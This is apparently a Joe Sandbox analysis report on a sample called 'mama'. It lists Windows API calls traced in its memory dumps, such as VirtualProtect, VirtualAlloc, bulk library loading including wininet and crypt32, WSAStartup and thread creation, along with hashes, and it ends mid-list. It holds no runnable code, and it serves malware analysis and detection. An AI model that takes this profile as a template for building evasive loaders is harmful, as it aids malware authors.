                                                          • Instruction ID: d34027627c4591a6ccaf5666ea10a93eb5e5540117f38e13847f7312546c02ce
                                                          • Opcode Fuzzy Hash: dffb3011768bfcca24cfcff7c2c7ed5e7ac71e5351df3f71f0cf46e1039b117a
                                                          • Instruction Fuzzy Hash: 54C11272A01B518BD715DF28E8C4725BFE1EB85354F8882AFDA55EF389C7B09845CB80

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 231 311bf68-311bfa2 call 2f7a364 call 311c878 236 311bfa4-311bfba VirtualProtect 231->236 237 311bfbd-311bfd2 call 2f79ebc 231->237 236->237
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?,00000000,0311BFD3), ref: 0311BFB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID: VirtualProtect
                                                          • API String ID: 544645111-268857135
                                                          • Opcode ID: d746a363e241d0fed3f300ca6457588dcd856a8d18592ca11bdbdaf4460445f6
                                                          • Instruction ID: 8fdd92961b9670b740f7df745d8a373c5070a57af142adbff8b1969d861bf319
                                                          • Opcode Fuzzy Hash: d746a363e241d0fed3f300ca6457588dcd856a8d18592ca11bdbdaf4460445f6
                                                          • Instruction Fuzzy Hash: 51F03C76614308AFCB00DFA8D9508DEBBE9EB4C310B518475F914D7740D7309A208F91

                                                          Control-flow Graph

                                                          APIs
                                                          • GetUserDefaultUILanguage.KERNEL32(00000000,02F7E4AB,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,02F7E532,00000000,?,00000105), ref: 02F7E43F
                                                          • GetSystemDefaultUILanguage.KERNEL32(00000000,02F7E4AB,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,02F7E532,00000000,?,00000105), ref: 02F7E467
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DefaultLanguage$SystemUser
                                                          • String ID:
                                                          • API String ID: 384301227-0
                                                          • Opcode ID: 016cfc97faa1776a6cac588e58a89e33319bf02bedac06a99079cfdef7b2e9d5
                                                          • Instruction ID: 7a6cd55b36c8c914be1b0a3c0cae8dfbf363305a6854ed9555e5ffa031e436e9
                                                          • Opcode Fuzzy Hash: 016cfc97faa1776a6cac588e58a89e33319bf02bedac06a99079cfdef7b2e9d5
                                                          • Instruction Fuzzy Hash: 76310D34E102199FDB10EF98C981AAEB7F6EF48394F5048B7D601A7250D7B4AD81CB91

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,02F7E572,?,00400000,0346EC1C,?,02F7D270,00400000,?,0000020A,00400000,0346EC1C,02F7D2B0), ref: 02F7E4F4
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,02F7E572,?,00400000,0346EC1C,?,02F7D270,00400000,?,0000020A), ref: 02F7E545
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileLibraryLoadModuleName
                                                          • String ID:
                                                          • API String ID: 1159719554-0
                                                          • Opcode ID: 0ebd0bcf7ff7eaddb62397f205dd5bb79c47d92ca3fc0edd534d16684c3f3c7e
                                                          • Instruction ID: 7909ee7bbfc656d1215ce400d9f4442835ce04f5dcffa3a2a2a604b44b00fdd3
                                                          • Opcode Fuzzy Hash: 0ebd0bcf7ff7eaddb62397f205dd5bb79c47d92ca3fc0edd534d16684c3f3c7e
                                                          • Instruction Fuzzy Hash: E3114271A4021C9BEB10EB64CD85BDE73B9DB04740F5140F7E608A6290EA705F848EA1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 326 3459234-3459259 WSAStartup GetLastError
                                                          APIs
                                                          • WSAStartup.WS2_32(00000101,?), ref: 03459249
                                                          • GetLastError.KERNEL32(?,03460B4F,00000000,03460EDA), ref: 0345924E
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastStartup
                                                          • String ID:
                                                          • API String ID: 1235836516-0
                                                          • Opcode ID: d0ae1a61364f19c51dbc86b56a314533f706d8ca4255612c41436a9af4e94cd5
                                                          • Instruction ID: 84a07e7031a894004bbe0fcd44b23520eb8d6293700a20f68597d343db76af2b
                                                          • Opcode Fuzzy Hash: d0ae1a61364f19c51dbc86b56a314533f706d8ca4255612c41436a9af4e94cd5
                                                          • Instruction Fuzzy Hash: 62C0807094020C5BD710FADC5C02DD9F35C8704700F0002E15E0CC6241FAB11A100BE2

                                                          Control-flow Graph

                                                          control_flow_graph 327 2f79d58-2f79d73 328 2f79d75-2f79d81 327->328 329 2f79d83-2f79d91 call 2f76edc 327->329 333 2f79d94-2f79dbb CreateThread 328->333 329->333 334 2f79dc4-2f79dcc 333->334 335 2f79dbd-2f79dbf call 2f76ef8 333->335 335->334
                                                          APIs
                                                          • CreateThread.KERNEL32(?,?,02F79D20,00000000,?,?), ref: 02F79DB2
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 3cd9c24851a6da52c3082edca2e45b9e8528179c9ebcbfd74834747268672a86
                                                          • Instruction ID: 1d3e14dd6c38e120e9ae0e99f2ac25df819318f62a141ad5b858668115265188
                                                          • Opcode Fuzzy Hash: 3cd9c24851a6da52c3082edca2e45b9e8528179c9ebcbfd74834747268672a86
                                                          • Instruction Fuzzy Hash: DC018472B04614AFC700DE9CD884A8AB7ECDB493A0F004027F608DB341D6B1ED00C7A5

                                                          Control-flow Graph

                                                          control_flow_graph 337 2f7d244-2f7d252 338 2f7d254-2f7d26b GetModuleFileNameW call 2f7e4b8 337->338 339 2f7d27f-2f7d28a 337->339 341 2f7d270-2f7d277 338->341 341->339 342 2f7d279-2f7d27c 341->342 342->339
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00400000,?,0000020A,00400000,0346EC1C,02F7D2B0,?,?,02F800C0), ref: 02F7D262
                                                            • Part of subcall function 02F7E4B8: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,02F7E572,?,00400000,0346EC1C,?,02F7D270,00400000,?,0000020A,00400000,0346EC1C,02F7D2B0), ref: 02F7E4F4
                                                            • Part of subcall function 02F7E4B8: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,02F7E572,?,00400000,0346EC1C,?,02F7D270,00400000,?,0000020A), ref: 02F7E545
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileModuleName$LibraryLoad
                                                          • String ID:
                                                          • API String ID: 4113206344-0
                                                          • Opcode ID: 7c1ee64858cc89b131c1bcaaf4c5d23a408bec5d341bc7def07cd761b0403ce4
                                                          • Instruction ID: bd935e75c22b1225f2b2299ae39798447f1337c9922cdf3553367ae89daead62
                                                          • Opcode Fuzzy Hash: 7c1ee64858cc89b131c1bcaaf4c5d23a408bec5d341bc7def07cd761b0403ce4
                                                          • Instruction Fuzzy Hash: 17E0C9B1A043109BDF14DE68C9C4B463794AF197A4F4445A6AE18DF246D3B1D9108BE1

                                                          Control-flow Graph

                                                          control_flow_graph 343 2f756b8-2f756d6 call 2f7564c VirtualAlloc 346 2f75726-2f75731 343->346 347 2f756d8-2f75725 343->347
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,02F75CCF,?,02F76274), ref: 02F756CF
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 6d2d3137d07c372220e16b4438d495b334e46ed645a9dad621cf12dbea257581
                                                          • Instruction ID: 41ba4d39cc135e158a469471a285e7e5aee690dfa9870062d05c6e9ebc28c3a2
                                                          • Opcode Fuzzy Hash: 6d2d3137d07c372220e16b4438d495b334e46ed645a9dad621cf12dbea257581
                                                          • Instruction Fuzzy Hash: 9FF03CF2B017118BE794EF7899807527BE5E744394B51417EEA49EF788D7B08C018B84
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,02F7DEFB,00000000,02F7DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,02F7DFD9), ref: 02F7DBE1
                                                          • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 02F7DBF2
                                                          • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?,?,02F7DEFB,00000000,02F7DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?), ref: 02F7DCF2
                                                          • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?,?,02F7DEFB,00000000,02F7DFBC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019), ref: 02F7DD04
                                                          • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?,?,02F7DEFB,00000000,02F7DFBC,?,80000001,Software\Embarcadero\Locales,00000000), ref: 02F7DD10
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?,?,02F7DEFB,00000000,02F7DFBC,?,80000001,Software\Embarcadero\Locales), ref: 02F7DD55
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                          • String ID: GetLongPathNameW$\$kernel32.dll
                                                          • API String ID: 1930782624-3908791685
                                                          • Opcode ID: 09fc5b0110bcdddf286d00de5964ddd207e0bcdae1469d3386ae4a29398b7da0
                                                          • Instruction ID: 330402b4cffd43293f62f5e74a57b23784edfc29915f696093f471612488af39
                                                          • Opcode Fuzzy Hash: 09fc5b0110bcdddf286d00de5964ddd207e0bcdae1469d3386ae4a29398b7da0
                                                          • Instruction Fuzzy Hash: C341C571E006189BCB10EBA8CD84BDDB3B6EF45390F9485A6CA05E7254E7B4EE45CF44
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,03435B9D), ref: 0343594B
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,03435B9D), ref: 03435975
                                                          • LoadLibraryW.KERNEL32(ntdll.dll,RtlGetVersion,00000000,03435AD5,?,?,?,?,?,?,03435B9D), ref: 034359C2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Version$LibraryLoad
                                                          • String ID: RtlGetVersion$ntdll.dll
                                                          • API String ID: 192404683-1489217083
                                                          • Opcode ID: 1997ee769154486f11bdbda70b30946754becee3750e62dc6210cf85d486c187
                                                          • Instruction ID: c48e3d4d54ebaf09159b181314430b776910832cf0228472c35195f515db4e07
                                                          • Opcode Fuzzy Hash: 1997ee769154486f11bdbda70b30946754becee3750e62dc6210cf85d486c187
                                                          • Instruction Fuzzy Hash: 8951C034A14208EFCB14EBA8C985ADEB7F5EF4A310F6584E6E808AB351D3309F40DB54
                                                          APIs
                                                          • IsValidLocale.KERNEL32(?,00000002,00000000,02F7D8CD,?,?,?,00000000), ref: 02F7D812
                                                          • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,02F7D8CD,?,?,?,00000000), ref: 02F7D82E
                                                          • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,02F7D8CD,?,?,?,00000000), ref: 02F7D83F
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Locale$Info$Valid
                                                          • String ID:
                                                          • API String ID: 1826331170-0
                                                          • Opcode ID: 80157ba6ce29966bdb95830b7760723fe0ad6737fb6cd80e85440df6e985aba6
                                                          • Instruction ID: 5c1b868ff43b729b651bae9cdd4f053538357d695fd8dcb41623698b57124b42
                                                          • Opcode Fuzzy Hash: 80157ba6ce29966bdb95830b7760723fe0ad6737fb6cd80e85440df6e985aba6
                                                          • Instruction Fuzzy Hash: 14318D75A0061CAAEB20EF64DD80FDEB7BAFF44B41F8004A6E609A7290D7355E81CE11
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(user32.dll), ref: 0311C8ED
                                                          • LoadLibraryW.KERNEL32(ntdll.dll,user32.dll), ref: 0311C909
                                                          • LoadLibraryW.KERNEL32(advapi32.dll,ntdll.dll,user32.dll), ref: 0311C925
                                                          • LoadLibraryW.KERNEL32(shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C941
                                                          • LoadLibraryW.KERNEL32(ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C95D
                                                          • LoadLibraryW.KERNEL32(ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C979
                                                          • LoadLibraryW.KERNEL32(wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C995
                                                          • LoadLibraryW.KERNEL32(wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C9AE
                                                          • LoadLibraryW.KERNEL32(crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C9C7
                                                          • LoadLibraryW.KERNEL32(PSAPI.dll,crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C9E0
                                                          • LoadLibraryW.KERNEL32(gdi32.dll,PSAPI.dll,crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311C9F9
                                                          • LoadLibraryW.KERNEL32(Iphlpapi.dll,gdi32.dll,PSAPI.dll,crypt32.dll,wtsapi32.dll,wininet.dll,ole32.dll,ws2_32.dll,shell32.dll,advapi32.dll,ntdll.dll,user32.dll), ref: 0311CA12
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: Iphlpapi.dll$PSAPI.dll$advapi32.dll$crypt32.dll$gdi32.dll$ntdll.dll$ole32.dll$shell32.dll$user32.dll$wininet.dll$ws2_32.dll$wtsapi32.dll
                                                          • API String ID: 1029625771-1098239973
                                                          • Opcode ID: 034d0f67040dac28d55821d82d3025a9949c2bde22dcd936a0c0955d28018674
                                                          • Instruction ID: e41b28c463b84259d053486f70487a35a56866b0c3eeb20262b65ab477216230
                                                          • Opcode Fuzzy Hash: 034d0f67040dac28d55821d82d3025a9949c2bde22dcd936a0c0955d28018674
                                                          • Instruction Fuzzy Hash: 6841C274986318EFC741EFA8E941ADCBBF5EB0D781B5090A6E406FB214E3705A50DF90
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(034AEC14,00000000,02F7DB84,?,?,?,00000000,?,02F7E44C,00000000,02F7E4AB,?,?,00000000,00000000,00000000), ref: 02F7DA9E
                                                          • LeaveCriticalSection.KERNEL32(034AEC14,034AEC14,00000000,02F7DB84,?,?,?,00000000,?,02F7E44C,00000000,02F7E4AB,?,?,00000000,00000000), ref: 02F7DAC2
                                                          • LeaveCriticalSection.KERNEL32(034AEC14,034AEC14,00000000,02F7DB84,?,?,?,00000000,?,02F7E44C,00000000,02F7E4AB,?,?,00000000,00000000), ref: 02F7DAD1
                                                          • IsValidLocale.KERNEL32(00000000,00000002,034AEC14,034AEC14,00000000,02F7DB84,?,?,?,00000000,?,02F7E44C,00000000,02F7E4AB), ref: 02F7DAE3
                                                          • EnterCriticalSection.KERNEL32(034AEC14,00000000,00000002,034AEC14,034AEC14,00000000,02F7DB84,?,?,?,00000000,?,02F7E44C,00000000,02F7E4AB), ref: 02F7DB40
                                                          • LeaveCriticalSection.KERNEL32(034AEC14,034AEC14,00000000,00000002,034AEC14,034AEC14,00000000,02F7DB84,?,?,?,00000000,?,02F7E44C,00000000,02F7E4AB), ref: 02F7DB69
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                          • String ID: en-GB,en,en-US,
                                                          • API String ID: 975949045-3021119265
                                                          • Opcode ID: da5e53c0384a2c811fce72c608ce571adc397556a040f38ccc731a87a85ed60e
                                                          • Instruction ID: 7827a057084eedca8789128fe047a0e62db3411f64af35e84f0385c8bff6a24c
                                                          • Opcode Fuzzy Hash: da5e53c0384a2c811fce72c608ce571adc397556a040f38ccc731a87a85ed60e
                                                          • Instruction Fuzzy Hash: 9E21AF20B006049AEB11B67C9D51A1E369BEF46BC4FD04427E7109F245DBA58C81CAAB
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 02F787BD
                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 02F787C3
                                                          • GetLogicalProcessorInformation.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 02F787D6
                                                          • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 02F787DF
                                                          • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,02F78856,?,00000000,?,GetLogicalProcessorInformation), ref: 02F7880A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                                                          • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                          • API String ID: 1184211438-79381301
                                                          • Opcode ID: c58b1fb6ec5969133533e697b30ff97e666b36ebe49b0cae916a70b55bb37f43
                                                          • Instruction ID: b5188e5ca3d9260e6941ee1e0733ef72b53dccc5e5b378f59f43b3f440bd5943
                                                          • Opcode Fuzzy Hash: c58b1fb6ec5969133533e697b30ff97e666b36ebe49b0cae916a70b55bb37f43
                                                          • Instruction Fuzzy Hash: 25117F71D00208AEEB10EBE5DC08F9DB7BAEB403C0F5484ABEA2497541D7B4CA40DF51
                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02F81868
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_43_2_2f70000_mama.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionRaise
                                                          • String ID:
                                                          • API String ID: 3997070919-0
                                                          • Opcode ID: afd356a106eb3d7ed50025bf40cbd4cc4ffe5bff902f208bd71fb53f9c7337d6
                                                          • Instruction ID: c507734907a3a5922b11a020757f102033150de19661e4bc5fef38a2a199d22f
                                                          • Opcode Fuzzy Hash: afd356a106eb3d7ed50025bf40cbd4cc4ffe5bff902f208bd71fb53f9c7337d6
                                                          • Instruction Fuzzy Hash: 73A17075E016099FDB10EFE8D980BEFF7F5AB48390F144219E609AB294D770A946CB60
                                                          APIs
                                                            • Part of subcall function 02F78EBC: GetCurrentThreadId.KERNEL32 ref: 02F78EBF
                                                          • GetTickCount.KERNEL32 ref: 02F78A67
                                                          • GetTickCount.KERNEL32 ref: 02F78A7F
                                                          • GetCurrentThreadId.KERNEL32 ref: 02F78AAE
                                                          • GetTickCount.KERNEL32 ref: 02F78AD9
                                                          • GetTickCount.KERNEL32 ref: 02F78B10
                                                          • GetTickCount.KERNEL32 ref: 02F78B3A
                                                          • GetCurrentThreadId.KERNEL32 ref: 02F78BAA
                                                          Memory Dump Source
                                                          • Source File: 0000002B.00000002.3755043923.0000000002F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F70000, based on PE: true
                                                          • Associated: 0000002B.00000002.3754956495.0000000002F70000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034B1000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 0000002B.00000002.3755043923.00000000034BD000.00000040.00001000.00020000.00000000.sdmp
                                                          Similarity
                                                          • API ID: CountTick$CurrentThread
                                                          • String ID:
                                                          • API String ID: 3968769311-0
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,02F79BB2,?,?,00000000,00000000,02F79CC6,02F79CE0,?,?,02F811E8), ref: 02F79B2D
                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,02F79BB2,?,?,00000000,00000000,02F79CC6,02F79CE0), ref: 02F79B33
